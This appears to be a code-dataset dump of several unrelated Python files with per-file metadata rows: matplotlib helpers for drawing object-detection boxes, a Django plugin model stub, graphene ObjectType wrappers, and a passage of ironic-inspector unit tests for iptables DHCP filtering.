        scale: multiplier applied to box coordinates.
        save_file_path: output path for the rendered figure.

    Fix: the figure is now closed after saving, matching the other helpers
    in this module and avoiding an accumulating open-figure leak.
    """
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for det in dets_B:
        det_row = det[0]
        # NOTE(review): the name is read from det[2] here but from det[1]
        # in show_detsB_gt_boxes — confirm which record layout callers use.
        cat_name = det[2]
        bbox = det_row[:4] * scale
        color = (rand(), rand(), rand())
        rect = plt.Rectangle((bbox[0], bbox[1]),
                             bbox[2] - bbox[0],
                             bbox[3] - bbox[1], fill=False,
                             edgecolor=color, linewidth=2.5)
        plt.gca().add_patch(rect)
        score = det_row[-1]
        plt.gca().text(bbox[0], bbox[1],
                       '{:s} {:.3f}'.format(cat_name, score),
                       bbox=dict(facecolor=color, alpha=0.5), fontsize=16, color='white')
    fig.savefig(save_file_path)
    plt.close(fig)
def show_dets_crops(im,dets,classes,scale=1.0,marg=0,save_file_path='temp_det_gt.png'):
    """Save one cropped image per detection, padded by `marg` pixels per side.

    Each crop is written to save_file_path with its extension replaced by
    '_<score>_<index>.jpg'.
    NOTE(review): if `dets` contains no detections at all, `score` and
    `idet` are never bound before the savefig call — confirm callers always
    supply at least one detection.
    """
    fig = plt.figure(2)
    plt.cla()
    fig.set_size_inches((8.5, 2 * 11), forward=False)
    for cls_idx, cls_name in enumerate(classes):
        cls_dets = dets[cls_idx]
        for idet,det in enumerate(cls_dets):
            plt.cla()
            bbox = det[:4] * scale
            #rect = im[int(bbox[0])-marg:int(bbox[2])+marg,int(bbox[1])-marg:int(bbox[3])+marg,:]
            # Crop rows by y (bbox[1]:bbox[3]) and columns by x (bbox[0]:bbox[2]).
            rect = im[int(bbox[1]) - marg:int(bbox[3]) + marg, int(bbox[0]) - marg:int(bbox[2]) + marg, :]
            plt.imshow(rect)
            score = det[-1]
            # Strip all margins so only the crop itself is saved.
            plt.gca().set_axis_off()
            plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
                                hspace=0, wspace=0)
            plt.margins(0, 0)
            fig.savefig(save_file_path[:-4]+'_{0:.3f}_{1}.jpg'.format(score,idet), bbox_inches='tight', pad_inches=0)
def show_dets_gt_boxes(im, dets,classes, gt_boxes,gt_classes, scale = 1.0,FS=22,LW=3.5, save_file_path='temp_det_gt.png'):
    """Plot per-class detections (left subplot) next to ground truth (right).

    Args:
        im: image array to display.
        dets: per-class detection arrays; rows are [x1, y1, x2, y2, score].
        classes: class names aligned with `dets`.
        gt_boxes, gt_classes: ground-truth boxes and their class names.
        scale: multiplier applied to detection coordinates.
        FS, LW: label font size and rectangle line width.
        save_file_path: output path for the rendered figure.

    Fixes: removed the redundant local imports of plt/rand that shadowed
    the module-level ones; renamed `ord` (shadowed the builtin) to `order`;
    replaced the manual score-accumulation loop with a comprehension.
    """
    # numpy and randint are only used by this function, so their imports
    # stay local (numpy is not imported at module level in this file).
    import numpy as np
    from random import randint
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 1 * 11), forward=False)
    plt.subplot(121)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for cls_dets, cls_name in zip(dets,classes):
        if len(cls_dets)==0:
            continue
        # Draw in ascending score order so the highest scores end up on top.
        scores = [det[-1] for det in cls_dets]
        order = np.argsort(scores)
        cls_dets = cls_dets[order]
        for det in cls_dets:
            bbox = det[:4] * scale
            color = (rand(), rand(), rand())
            rect = plt.Rectangle((bbox[0], bbox[1]),
                                 bbox[2] - bbox[0],
                                 bbox[3] - bbox[1], fill=False,
                                 edgecolor=color, linewidth=LW)
            plt.gca().add_patch(rect)
            score = det[-1]
            # Randomly anchor the label at the top-left or bottom-left box
            # corner to reduce overlapping label text.
            corner = randint(1, 2)
            if corner == 1:
                x0 = bbox[0]; y0 = bbox[1]
            if corner == 2:
                x0 = bbox[0]; y0 = bbox[3]
            plt.gca().text(x0,y0,
                           '{:s} {:.3f}'.format(cls_name, score),
                           bbox=dict(facecolor=color, alpha=0.6), fontsize=FS, color='white')
    plt.subplot(122)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for cls_idx, cls_name in enumerate(gt_classes):
        bbox = gt_boxes[cls_idx]
        color = (rand(), rand(), rand())
        rect = plt.Rectangle((bbox[0], bbox[1]),
                             bbox[2] - bbox[0],
                             bbox[3] - bbox[1], fill=False,
                             edgecolor=color, linewidth=LW)
        plt.gca().add_patch(rect)
        plt.gca().text(bbox[0], bbox[1],
                       '{:s}'.format(cls_name),
                       bbox=dict(facecolor=color, alpha=0.6), fontsize=FS, color='white')
    # Remove all margins so the saved image is just the plotted content.
    plt.gca().set_axis_off()
    plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
                        hspace=0, wspace=0)
    plt.margins(0, 0)
    fig.savefig(save_file_path, bbox_inches = 'tight', pad_inches = 0)
    plt.close(fig)
def show_boxes(im, dets, classes, scale = 1.0, save_file_path='temp.png'):
    """Draw per-class detection boxes on an image and save the figure.

    Each entry of `dets` holds the detections for the class at the same
    position in `classes`; rows are [x1, y1, x2, y2] plus an optional score
    column. Returns the input image unchanged.
    """
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for class_dets, class_name in zip(dets, classes):
        for detection in class_dets:
            box = detection[:4] * scale
            colour = (rand(), rand(), rand())
            width = box[2] - box[0]
            height = box[3] - box[1]
            patch = plt.Rectangle((box[0], box[1]), width, height,
                                  fill=False, edgecolor=colour,
                                  linewidth=2.5)
            plt.gca().add_patch(patch)
            if class_dets.shape[1] == 5:
                # A fifth column means a confidence score is present.
                plt.gca().text(box[0], box[1],
                               '{:s} {:.3f}'.format(class_name, detection[-1]),
                               bbox=dict(facecolor=colour, alpha=0.5),
                               fontsize=16, color='white')
    fig.savefig(save_file_path)
    plt.close(fig)
    return im
def show_gt_boxes(im, boxes, classes, scale = 1.0, save_file_path='temp.png'):
    """Draw one labeled box per class name on an image and save the figure.

    Returns the input image unchanged. `scale` is accepted for interface
    parity with the other helpers but is not applied to the boxes.
    """
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for idx, class_name in enumerate(classes):
        box = boxes[idx]
        colour = (rand(), rand(), rand())
        patch = plt.Rectangle((box[0], box[1]),
                              box[2] - box[0],
                              box[3] - box[1],
                              fill=False, edgecolor=colour, linewidth=2.5)
        plt.gca().add_patch(patch)
        plt.gca().text(box[0], box[1],
                       '{:s}'.format(class_name),
                       bbox=dict(facecolor=colour, alpha=0.5),
                       fontsize=16, color='white')
    fig.savefig(save_file_path)
    plt.close(fig)
    return im
def show_train_and_rois(im, box_tr, rois,save_file_path):
    """Overlay candidate RoIs (green, thin) and the training box (red, thick)
    on an image, then save the figure to save_file_path."""
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)

    def _draw_box(box, colour, width):
        # Add one unfilled rectangle for `box` to the current axes.
        patch = plt.Rectangle((box[0], box[1]),
                              box[2] - box[0],
                              box[3] - box[1],
                              fill=False, edgecolor=colour, linewidth=width)
        plt.gca().add_patch(patch)

    for roi in rois:
        _draw_box(roi, (0, 1, 0), 1.0)
    _draw_box(box_tr, (1, 0, 0), 2.5)
    fig.savefig(save_file_path)
def show_just_boxes(im, boxes, scale = 1.0, save_file_path='temp.png'):
    """Draw unlabeled boxes ([x1, y1, x2, y2] each) on an image and save it.

    Returns the input image unchanged. `scale` is accepted for interface
    parity with the other helpers but is not applied.

    BUG FIX: the original iterated `enumerate(boxes)`, so `bbox` was an
    (index, box) tuple and bbox[0]/bbox[1] were the index and the whole box
    rather than coordinates. Iterate the boxes directly.
    """
    fig = plt.figure(1)
    fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
    plt.cla()
    plt.axis("off")
    plt.imshow(im)
    for bbox in boxes:
        color = (rand(), rand(), rand())
        rect = plt.Rectangle((bbox[0], bbox[1]),
                             bbox[2] - bbox[0],
                             bbox[3] - bbox[1], fill=False,
                             edgecolor=color, linewidth=2.5)
        plt.gca().add_patch(rect)
    fig.savefig(save_file_path)
    plt.close(fig)  # release the figure, matching show_boxes/show_gt_boxes
    return im
| 35.321678
| 123
| 0.507127
| 1,362
| 10,102
| 3.643906
| 0.110866
| 0.030224
| 0.047149
| 0.032239
| 0.834777
| 0.810598
| 0.772114
| 0.7568
| 0.728189
| 0.728189
| 0
| 0.044224
| 0.330727
| 10,102
| 285
| 124
| 35.445614
| 0.689839
| 0.065631
| 0
| 0.804444
| 0
| 0
| 0.024947
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035556
| false
| 0
| 0.044444
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38084c1c9cb74186e95e12f0a8c5dabdbf1ce6b2
| 103
|
py
|
Python
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 52
|
2016-09-13T03:50:58.000Z
|
2022-02-23T16:25:08.000Z
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 304
|
2016-08-11T14:17:30.000Z
|
2020-07-22T13:35:18.000Z
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 12
|
2016-09-21T18:46:35.000Z
|
2021-02-15T19:37:50.000Z
|
from . import abstract_models
class PageAnchorItem(abstract_models.AbstractPageAnchorItem):
    # Concrete model for the page-anchor plugin; all fields and behavior
    # come from AbstractPageAnchorItem — this subclass only makes it concrete.
    pass
| 17.166667
| 61
| 0.825243
| 10
| 103
| 8.3
| 0.8
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126214
| 103
| 5
| 62
| 20.6
| 0.922222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
69dcbaf180f25588720b1b1ae1213555bdd0cc05
| 916
|
py
|
Python
|
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | 1
|
2019-02-02T15:01:32.000Z
|
2019-02-02T15:01:32.000Z
|
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | null | null | null |
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | null | null | null |
import graphene
class ObjectType(graphene.ObjectType):
    '''
    Mapping/iterable wrapper around graphene's ObjectType so instances can
    be passed to other functions pythonically (e.g. dict(obj), **obj).
    '''
    def __iter__(self):
        '''Yield (field_name, value) pairs for each declared meta field.'''
        return ((name, getattr(self, name)) for name in self._meta.fields)

    def keys(self):
        '''Expose the declared field names (enables dict(obj) / **obj).'''
        return self._meta.fields.keys()

    def __getitem__(self, item):
        '''Mapping-style access: obj[name] is getattr(obj, name).'''
        return getattr(self, item)
class InputObjectType(graphene.InputObjectType):
    '''
    Mapping/iterable wrapper around graphene's InputObjectType so instances
    can be passed to other functions pythonically (e.g. dict(obj), **obj).
    '''
    def __iter__(self):
        '''Yield (field_name, value) pairs for each declared meta field.'''
        for field_name in self._meta.fields:
            value = getattr(self, field_name)
            yield field_name, value

    def keys(self):
        '''Expose the declared field names (enables dict(obj) / **obj).'''
        return self._meta.fields.keys()

    def __getitem__(self, item):
        '''Mapping-style access: obj[name] is getattr(obj, name).'''
        return getattr(self, item)
| 24.105263
| 77
| 0.674672
| 108
| 916
| 5.537037
| 0.333333
| 0.053512
| 0.093645
| 0.093645
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0
| 0
| 0.246725
| 916
| 37
| 78
| 24.756757
| 0.866667
| 0.287118
| 0
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.352941
| false
| 0
| 0.058824
| 0.235294
| 0.764706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
387068ce36ac09acafc39b86cc7ebb7d5f018a9a
| 19,157
|
py
|
Python
|
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import firewall
from ironic_inspector import introspection_state as istate
from ironic_inspector import node_cache
from ironic_inspector.test import base as test_base
CONF = cfg.CONF
# Sample EMAC=... IMAC=... address-mapping lines (InfiniBand-style data);
# presumably consumed by firewall tests beyond this chunk — TODO confirm.
IB_DATA = """
EMAC=02:00:02:97:00:01 IMAC=97:fe:80:00:00:00:00:00:00:7c:fe:90:03:00:29:26:52
EMAC=02:00:00:61:00:02 IMAC=61:fe:80:00:00:00:00:00:00:7c:fe:90:03:00:29:24:4f
"""
@mock.patch.object(firewall, '_iptables')
@mock.patch.object(ir_utils, 'get_client')
@mock.patch.object(firewall.subprocess, 'check_call')
class TestFirewall(test_base.NodeTest):
CLIENT_ID = 'ff:00:00:00:00:00:02:00:00:02:c9:00:7c:fe:90:03:00:29:24:4f'
def test_update_filters_without_manage_firewall(self, mock_call,
mock_get_client,
mock_iptables):
CONF.set_override('manage_firewall', False, 'firewall')
firewall.update_filters()
self.assertEqual(0, mock_iptables.call_count)
    def test_init_args(self, mock_call, mock_get_client, mock_iptables):
        """init() tears down any stale chain, recreates it, and builds the
        base iptables command including '-w'."""
        rootwrap_path = '/some/fake/path'
        CONF.set_override('rootwrap_config', rootwrap_path)
        firewall.init()
        # Expected order: unhook the chain from INPUT (-D), flush it (-F),
        # delete it (-X), then create it fresh (-N).
        init_expected_args = [
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport', '67',
             '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-N', CONF.firewall.firewall_chain)]
        call_args_list = mock_iptables.call_args_list
        # zip() stops at the shorter sequence, so only the leading calls
        # are compared here.
        for (args, call) in zip(init_expected_args, call_args_list):
            self.assertEqual(args, call[0])
        expected = ('sudo', 'ironic-inspector-rootwrap', rootwrap_path,
                    'iptables', '-w')
        self.assertEqual(expected, firewall.BASE_COMMAND)
    def test_init_args_old_iptables(self, mock_call, mock_get_client,
                                    mock_iptables):
        """When probing fails (old iptables), init() drops '-w' from the
        base command but performs the same chain setup."""
        rootwrap_path = '/some/fake/path'
        CONF.set_override('rootwrap_config', rootwrap_path)
        # Simulate an iptables binary that rejects the probe invocation.
        mock_call.side_effect = firewall.subprocess.CalledProcessError(2, '')
        firewall.init()
        init_expected_args = [
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport', '67',
             '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-N', CONF.firewall.firewall_chain)]
        call_args_list = mock_iptables.call_args_list
        for (args, call) in zip(init_expected_args, call_args_list):
            self.assertEqual(args, call[0])
        # Same base command as test_init_args but without the '-w' flag.
        expected = ('sudo', 'ironic-inspector-rootwrap', rootwrap_path,
                    'iptables',)
        self.assertEqual(expected, firewall.BASE_COMMAND)
def test_init_kwargs(self, mock_call, mock_get_client, mock_iptables):
firewall.init()
init_expected_kwargs = [
{'ignore': True},
{'ignore': True},
{'ignore': True}]
call_args_list = mock_iptables.call_args_list
for (kwargs, call) in zip(init_expected_kwargs, call_args_list):
self.assertEqual(kwargs, call[1])
    def test_update_filters_args(self, mock_call, mock_get_client,
                                 mock_iptables):
        """update_filters() issues the expected iptables sequence when a node
        is waiting for introspection."""
        # Pretend that we have nodes on introspection
        node_cache.add_node(self.node.uuid, state=istate.States.waiting,
                            bmc_address='1.2.3.4')
        firewall.init()
        # Sequence: init tears down/recreates the main chain; update_filters
        # then builds NEW_CHAIN, appends an ACCEPT rule, hooks it into
        # INPUT, removes the old chain, and renames (-E) NEW_CHAIN to it.
        update_filters_expected_args = [
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-N', CONF.firewall.firewall_chain),
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', firewall.NEW_CHAIN),
            ('-F', firewall.NEW_CHAIN),
            ('-X', firewall.NEW_CHAIN),
            ('-N', firewall.NEW_CHAIN),
            ('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
            ('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', firewall.NEW_CHAIN),
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
        ]
        firewall.update_filters()
        call_args_list = mock_iptables.call_args_list
        for (args, call) in zip(update_filters_expected_args,
                                call_args_list):
            self.assertEqual(args, call[0])
    def test_update_filters_kwargs(self, mock_call, mock_get_client,
                                   mock_iptables):
        """Teardown-style iptables calls pass ignore=True; the creation and
        rule-adding calls (empty dicts below) must not."""
        firewall.init()
        update_filters_expected_kwargs = [
            {'ignore': True},
            {'ignore': True},
            {'ignore': True},
            {},
            {'ignore': True},
            {'ignore': True},
            {'ignore': True},
            {},
            {},
            {},
            {'ignore': True},
            {'ignore': True},
            {'ignore': True}
        ]
        firewall.update_filters()
        call_args_list = mock_iptables.call_args_list
        # call[1] is each mock call's kwargs dict.
        for (kwargs, call) in zip(update_filters_expected_kwargs,
                                  call_args_list):
            self.assertEqual(kwargs, call[1])
    def test_update_filters_with_blacklist(self, mock_call, mock_get_client,
                                           mock_iptables):
        """A DROP rule is inserted ahead of ACCEPT for the blacklisted MAC,
        and an unchanged second run is served from cache."""
        active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
        inactive_mac = ['AA:BB:CC:DD:EE:FF']
        self.macs = active_macs + inactive_mac
        # The mocked ironic client reports ports for all three MACs.
        self.ports = [mock.Mock(address=m) for m in self.macs]
        mock_get_client.port.list.return_value = self.ports
        # One node in 'finished' state owns the two active MACs; the
        # expected rules below blacklist inactive_mac[0] — confirm the
        # intended blacklist semantics against the firewall module.
        node_cache.add_node(self.node.uuid, mac=active_macs,
                            state=istate.States.finished,
                            bmc_address='1.2.3.4', foo=None)
        firewall.init()
        update_filters_expected_args = [
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-N', CONF.firewall.firewall_chain),
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', firewall.NEW_CHAIN),
            ('-F', firewall.NEW_CHAIN),
            ('-X', firewall.NEW_CHAIN),
            ('-N', firewall.NEW_CHAIN),
            # Blacklist
            ('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
             inactive_mac[0], '-j', 'DROP'),
            ('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
            ('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', firewall.NEW_CHAIN),
            ('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
             '67', '-j', CONF.firewall.firewall_chain),
            ('-F', CONF.firewall.firewall_chain),
            ('-X', CONF.firewall.firewall_chain),
            ('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
        ]
        firewall.update_filters(mock_get_client)
        call_args_list = mock_iptables.call_args_list
        for (args, call) in zip(update_filters_expected_args,
                                call_args_list):
            self.assertEqual(args, call[0])
        # check caching
        # With unchanged state, a second run must not touch iptables at all.
        mock_iptables.reset_mock()
        firewall.update_filters(mock_get_client)
        self.assertFalse(mock_iptables.called)
def test_update_filters_clean_cache_on_error(self, mock_call,
mock_get_client,
mock_iptables):
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
inactive_mac = ['AA:BB:CC:DD:EE:FF']
self.macs = active_macs + inactive_mac
self.ports = [mock.Mock(address=m) for m in self.macs]
mock_get_client.port.list.return_value = self.ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
inactive_mac[0], '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
mock_iptables.side_effect = [None, None, RuntimeError()]
self.assertRaises(RuntimeError, firewall.update_filters,
mock_get_client)
# check caching
mock_iptables.reset_mock()
mock_iptables.side_effect = None
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_args_node_not_found_hook(self, mock_call,
mock_get_client,
mock_iptables):
# DHCP should be always opened if node_not_found hook is set
CONF.set_override('node_not_found_hook', 'enroll', 'processing')
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_args_no_introspection(self, mock_call,
mock_get_client,
mock_iptables):
firewall.init()
firewall.BLACKLIST_CACHE = ['foo']
mock_get_client.return_value.port.list.return_value = [
mock.Mock(address='foobar')]
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
('-A', firewall.NEW_CHAIN, '-j', 'REJECT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
self.assertIsNone(firewall.BLACKLIST_CACHE)
# Check caching enabled flag
mock_iptables.reset_mock()
firewall.update_filters()
self.assertFalse(mock_iptables.called)
# Adding a node changes it back
node_cache.add_node(self.node.uuid, state=istate.States.starting,
bmc_address='1.2.3.4')
mock_iptables.reset_mock()
firewall.update_filters()
mock_iptables.assert_any_call('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT')
self.assertEqual({'foobar'}, firewall.BLACKLIST_CACHE)
def test_update_filters_infiniband(
self, mock_call, mock_get_client, mock_iptables):
CONF.set_override('ethoib_interfaces', ['eth0'], 'firewall')
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
expected_rmac = '02:00:00:61:00:02'
ports = [mock.Mock(address=m) for m in active_macs]
ports.append(mock.Mock(address='7c:fe:90:29:24:4f',
extra={'client-id': self.CLIENT_ID},
spec=['address', 'extra']))
mock_get_client.port.list.return_value = ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
expected_rmac, '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
fileobj = mock.mock_open(read_data=IB_DATA)
with mock.patch('six.moves.builtins.open', fileobj, create=True):
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_infiniband_no_such_file(
self, mock_call, mock_get_client, mock_iptables):
CONF.set_override('ethoib_interfaces', ['eth0'], 'firewall')
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
ports = [mock.Mock(address=m) for m in active_macs]
ports.append(mock.Mock(address='7c:fe:90:29:24:4f',
extra={'client-id': self.CLIENT_ID},
spec=['address', 'extra']))
mock_get_client.port.list.return_value = ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
